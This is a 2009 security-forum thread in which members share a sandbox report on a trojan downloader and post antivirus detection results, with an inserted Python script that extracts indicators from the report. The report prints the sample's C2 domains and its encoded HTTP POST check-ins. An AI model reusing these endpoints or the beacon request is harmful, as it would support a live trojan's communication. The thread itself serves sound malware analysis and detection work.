Views: 4950 | Replies: 9

[Virus Sample] A suspicious sample~

coldwinter
Posted on 2009-9-9 15:09:02
Size:    94208
MD5:     3e00b4d7826f51e9d1a9b00d2fa6fd6e
SHA1:    ef65e4638b06591f8590b9dbdb2f40b0b63213ef
SHA256:  aae2a82d89a6493f4569ff4e6ea91e9f0946d4b73d45f6fe7c95556e619fd022
Process: Exited

• Keys Created
  Name                                                          Time
  LM\Software\Microsoft\RFC1156Agent                            2009.01.12 15:12:45.578
  LM\Software\Microsoft\RFC1156Agent\CurrentVersion             2009.01.12 15:12:45.578
  LM\Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters  2009.01.12 15:12:45.578

• Keys Changed
  (none listed)

• Keys Deleted
  (none listed)

• Values Created
  Name:  LM\Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters\TrapPollTimeMilliSecs
  Type:  REG_DWORD    Size: 4    Value: 0x3a98

• Values Changed (old / new)
  Name:  CU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
  Type:  REG_BINARY / REG_BINARY    Size: 52 / 56    Value: ? / ?

• Values Deleted
  (none listed)

• Directories Created
  (none listed)

• Directories Changed
  (none listed)

• Directories Deleted
  (none listed)

• Files Created
  (none listed)

• Files Changed (old / new)
  Name:              C:\WINDOWS\system32\config\software
  Size:              8912896 / 8912896
  Last Write Time:   2009.01.12 15:10:01.953 / 2009.01.12 15:12:45.578
  Creation Time:     2008.07.31 16:55:51.593 / 2008.07.31 16:55:51.593
  Last Access Time:  2009.01.12 15:10:01.953 / 2009.01.12 15:10:01.953
  Attr:              0x20 / 0x20

• Files Deleted
  Name:              C:\TEST\sample.exe
  Size:              94208
  Last Write Time:   2009.01.12 15:12:41.375
  Creation Time:     2009.01.12 15:12:20.546
  Last Access Time:  2009.01.12 15:12:20.546
  Attr:              0x20

• Directories Hidden
  (none listed)

• Files Hidden
  (none listed)

• Drivers Loaded
  (none listed)

• Drivers Unloaded
  (none listed)

• Processes Created
  PId    Process Name  Image Name
  0x4e8  cmd.exe       C:\WINDOWS\system32\cmd.exe

• Processes Terminated
  (none listed)

• Threads Created
  PId    Process Name  TId    Start       Start Mem  Win32 Start  Win32 Start Mem
  0x2ac  lsass.exe     0x724  0x7c810856  MEM_IMAGE  0x77e76bf0   MEM_IMAGE
  0x348  svchost.exe   0xf8   0x7c810856  MEM_IMAGE  0x7c910760   MEM_IMAGE
  0x3f4  svchost.exe   0x2d0  0x7c810856  MEM_IMAGE  0x77e76bf0   MEM_IMAGE
  0x424  svchost.exe   0x4cc  0x7c810856  MEM_IMAGE  0x77df9981   MEM_IMAGE
  0x4e8  cmd.exe       0x4ec  0x7c810867  MEM_IMAGE  0x4ad05056   MEM_IMAGE

• Modules Loaded
  (none listed)

• Windows Api Calls
  (none listed)

• DNS Queries
  myart-gallery.com IN A +
  yourkoarts.com IN A +
  bestartcollection.com IN A +

• HTTP Queries
  myart-gallery.com POST /senm.php?data=v22MzjS0H4X1XjRmvVFHEeE2PuPsctM6PdFWTH11KB0CWwXTiUHUzGr1BVrHIQqMgMqV750Teg== HTTP/1.1
  yourkoarts.com POST /senm.php?data=v22MzjS0H4X1XjRmvVFHEeE2PuPsctM6PdFWTH11KB0CWwXTiUHUzGr1BVrHIQqMgMqV750Teg== HTTP/1.1
  bestartcollection.com POST /senm.php?data=v22MzjS0H4X1XjRmvVFHEeE2PuPsctM6PdFWTH11KB0CWwXTiUHUzGr1BVrHIQqMgMqV750Teg== HTTP/1.1

• Verdict
  Auto Analysis Verdict: Suspicious++

• Description
  Suspicious Actions Detected:
  - Creates and executes scripts
  - Deletes self

• Mutexes Created or Opened
  PId    Image Name          Address     Mutex Name
  0x684  C:\TEST\sample.exe  0x76ee3a34  RasPbFile
  0x684  C:\TEST\sample.exe  0x771ba3ae  _!MSFTHISTORY!_
  0x684  C:\TEST\sample.exe  0x771bc21c  WininetConnectionMutex
  0x684  C:\TEST\sample.exe  0x771bc23d  WininetProxyRegistryMutex
  0x684  C:\TEST\sample.exe  0x771bc2dd  WininetStartupMutex
  0x684  C:\TEST\sample.exe  0x771d9710  c:!documents and settings!user!cookies!
  0x684  C:\TEST\sample.exe  0x771d9710  c:!documents and settings!user!local settings!history!history.ie5!
  0x684  C:\TEST\sample.exe  0x771d9710  c:!documents and settings!user!local settings!temporary internet files!content.ie5!

• Events Created or Opened
  PId    Image Name          Address     Event Name
  0x684  C:\TEST\sample.exe  0x769c4ec2  Global\userenv: User Profile setup event
  0x684  C:\TEST\sample.exe  0x77a89422  Global\crypt32LogoffEvent
  0x684  C:\TEST\sample.exe  0x77de5f48  Global\SvcctrlStartEvent_A3752DX


Undetected by every antivirus engine on virscan.org.

[Last edited by coldwinter on 2009-9-9 15:10]

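The sandbox report above is easier to act on once it is reduced to indicators. The following is an added example (my own code, not coldwinter's post and not the sandbox's output) that parses the DNS and HTTP lines exactly as printed in the report, builds an IOC list, and flags the one pattern that stands out here: the same POST body sent to three different hosts in a row, which is what a hard-coded fallback C2 list looks like in a sandbox run. It also checks whether the `data=` blob is well-formed base64 and reports its decoded length, without claiming to know what encoding or cipher sits underneath. The function names and the `min_hosts` threshold are my choices; the input lines are copied from the report.

```python
import base64
import binascii
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Lines copied verbatim from the report's "HTTP Queries" and "DNS Queries"
# sections; any other report in the same flat format works the same way.
HTTP_LINES = [
    "myart-gallery.com POST /senm.php?data=v22MzjS0H4X1XjRmvVFHEeE2PuPsctM6PdFWTH11KB0CWwXTiUHUzGr1BVrHIQqMgMqV750Teg== HTTP/1.1",
    "yourkoarts.com POST /senm.php?data=v22MzjS0H4X1XjRmvVFHEeE2PuPsctM6PdFWTH11KB0CWwXTiUHUzGr1BVrHIQqMgMqV750Teg== HTTP/1.1",
    "bestartcollection.com POST /senm.php?data=v22MzjS0H4X1XjRmvVFHEeE2PuPsctM6PdFWTH11KB0CWwXTiUHUzGr1BVrHIQqMgMqV750Teg== HTTP/1.1",
]
DNS_LINES = [
    "myart-gallery.com IN A +",
    "yourkoarts.com IN A +",
    "bestartcollection.com IN A +",
]

HTTP_RE = re.compile(r"^(?P<host>\S+)\s+(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+HTTP/[\d.]+$")
DNS_RE = re.compile(r"^(?P<name>\S+)\s+IN\s+(?P<rtype>[A-Z]+)\b")


def split_query(query):
    """Split a query string without percent-decoding it: base64 blobs may
    contain '+' and '=', which urllib's parse_qs would turn into spaces or
    treat as separators."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[key] = value
    return params


def parse_http(lines):
    records = []
    for line in lines:
        m = HTTP_RE.match(line.strip())
        if m is None:
            continue
        target = urlsplit(m["target"])
        records.append({"host": m["host"], "method": m["method"],
                        "path": target.path, "params": split_query(target.query)})
    return records


def parse_dns(lines):
    return [m["name"] for m in (DNS_RE.match(line.strip()) for line in lines) if m]


def fallback_c2_groups(records, min_hosts=2):
    """Group requests that share method, path and parameters.  One payload
    sent unchanged to several hosts in succession is the signature of a
    binary walking a built-in list of C2 domains until one answers."""
    groups = defaultdict(set)
    for r in records:
        key = (r["method"], r["path"], tuple(sorted(r["params"].items())))
        groups[key].add(r["host"])
    return {key: sorted(hosts) for key, hosts in groups.items() if len(hosts) >= min_hosts}


def describe_blob(value):
    """Report whether a parameter value is well-formed base64 and how many
    bytes it decodes to.  The decoded bytes are very likely encrypted or
    custom-encoded, so nothing further is inferred from them here."""
    try:
        raw = base64.b64decode(value, validate=True)
    except binascii.Error:
        return {"base64": False}
    printable = sum(32 <= b < 127 for b in raw) / len(raw) if raw else 0.0
    return {"base64": True, "decoded_len": len(raw), "printable_ratio": round(printable, 2)}


def iocs(http_lines, dns_lines):
    records = parse_http(http_lines)
    domains = sorted({r["host"] for r in records} | set(parse_dns(dns_lines)))
    urls = sorted({f"http://{r['host']}{r['path']}" for r in records})
    return {"domains": domains, "urls": urls, "fallback_groups": fallback_c2_groups(records)}


if __name__ == "__main__":
    result = iocs(HTTP_LINES, DNS_LINES)
    print("domains:", ", ".join(result["domains"]))
    for (method, path, params), hosts in result["fallback_groups"].items():
        print(f"{method} {path} sent to {len(hosts)} hosts: {', '.join(hosts)}")
        for key, value in params:
            print(f"  {key}= {describe_blob(value)}")
```

Run it on the three lines above and you get one group: `POST /senm.php` with an identical `data=` value to all three domains, and the blob decoding to 55 bytes. The printable ratio is only a hint; a low value is consistent with the ciphertext-style check-in most downloaders of this era used, and the script deliberately stops there rather than guess at the scheme.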
kaap
Posted on 2009-9-9 15:10:13

Reply to #1, coldwinter's post

Reported to Rising
RS20090909150544890878
rok827
Posted on 2009-9-9 15:11:28

Filename  Result
xx.exe    UNDER ANALYSIS

The file 'xx.exe' has been determined to be 'UNDER ANALYSIS'

[Last edited by rok827 on 2009-9-9 15:12]
coldwinter (OP)
Posted on 2009-9-9 15:15:16
thank you~~
The EQs
Posted on 2009-9-9 15:17:10
Yet another UPX with a pile of data appended...
Posting a sample with the packer stripped off

rok827
Posted on 2009-9-9 15:20:38

Reply to #5, The EQs' post

To Avira, thank you for your help
失落的手链
Posted on 2009-9-9 17:22:46
Rising 2010
Query ID:     RS20090909150544890878
File name:    xx.rar
File MD5:     E61B3018396EAB966410310234EBAC65
File status:  archive containing 1 file
File name  MD5           Status     Virus name  Fixed in version
xx.exe     3E00B4D78...  Safe file
jason_jiang
Posted on 2009-9-9 17:46:16

Reply to #5, The EQs' post

D:\Backup\桌面\dumped_.exe - Infected: Trojan.Siggen.3969
sam.to
Posted on 2009-9-9 17:53:14
https://www.virustotal.com/anali ... e619fbcc-1252489980
To kl, ll, mcafee, comodo

Hello,

xx.ex%e - Trojan-Downloader.Win32.CodecPack.kct

New malicious software was found in this file. Its detection will be included in the next update. Thank you for your help.

[Last edited by sam.to on 2009-9-9 18:03]
090168
Posted on 2009-9-14 00:42:29

AVG reports 2 detections:

"D:\垃圾下载专区\360\xx.rar";"Trojan horse Downloader.Generic8.BPGF";"Infected"
"D:\垃圾下载专区\360\xx.rar:\xx.exe";"Trojan horse Downloader.Generic8.BPGF";"Infected"
Kafan Forum (KaFan.cn), Copyright © KaFan KaFan.cn All Rights Reserved.